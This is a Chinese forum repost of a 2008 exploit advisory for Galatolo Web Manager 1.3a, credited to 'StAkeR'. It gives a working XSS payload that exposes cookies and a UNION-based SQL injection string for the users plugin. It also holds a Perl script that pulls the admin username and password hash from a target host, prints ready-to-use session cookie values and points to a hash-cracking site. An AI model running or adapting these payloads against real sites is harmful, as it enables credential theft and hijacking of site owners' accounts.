• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Galatolo Web Manager 1.3a

    发布者: 午夜收音机 | 发布时间: 2025-6-28 22:48| 查看数: 105| 评论数: 0|帖子模式

    --== ============================================================================ ==--
    --==    Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability     ==--   
    --== ============================================================================ ==--

  • Discovered By: StAkeR ~ StAkeR@hotmail.it
    [ ] Discovered On: 14 Jul 2008
    [ ] Download: http://gwm.dev-area.org/view.php?id=8

  • Vulnerabilities:

  • XSS <= 1.3a
    [ ] all.php?tag= [Code Javascript]
    [ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

  • SQL (plugin users) 1.3a
    [ ] plugins/users/index.php?id= [Code SQL]
    [ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

  • Exploit:

    #!/usr/bin/perl
    use strict;
    use LWP::UserAgent;

    my $host = shift;
    my ($start,$content,@login);
    my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

    if($host =~ /^http:\/\/?/i)
    {
       $start = new LWP::UserAgent or die "[ ] Unable to connect\n";
       $start->timeout(1);
       $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
       $content = $start->get($host.$evilxx);
      
       if($content->is_success)
       {
         if($content->content =~ /%(. ?)%([0-9a-f]{32})/)
         {
           push(@login,$1,$2);
           print "[ ] Login:\n";
           print "[ ] Username: $login[0]\n";
           print "[ ] Password: $login[1]\n\n";
          
           print "[ ] Cookie Session:\n";
           print "[ ] gwm_user = $login[0]\n";
           print "[ ] gwm_pass = $login[1]\n\n";
          
           print "[ ] Crack Password:\n";
           print "[ ] md5(md5(password)) for crack:\n";
           print "[ ] http://passcracking.com\n";
         }
         else
         {
           print "[ ] Exploit Failed\n";
           print "[ ] Site Not Vulnerable\n";
         }
       }
    }
    else
    {
       print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
       print "[ ] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
       print "[ ] Usage: Perl $0 <host>\n";
       print "[ ] Usage: Perl $0 http://site.com\n";
    }

    来源:https://www.jb51.net/hack/5687.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
  • 最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表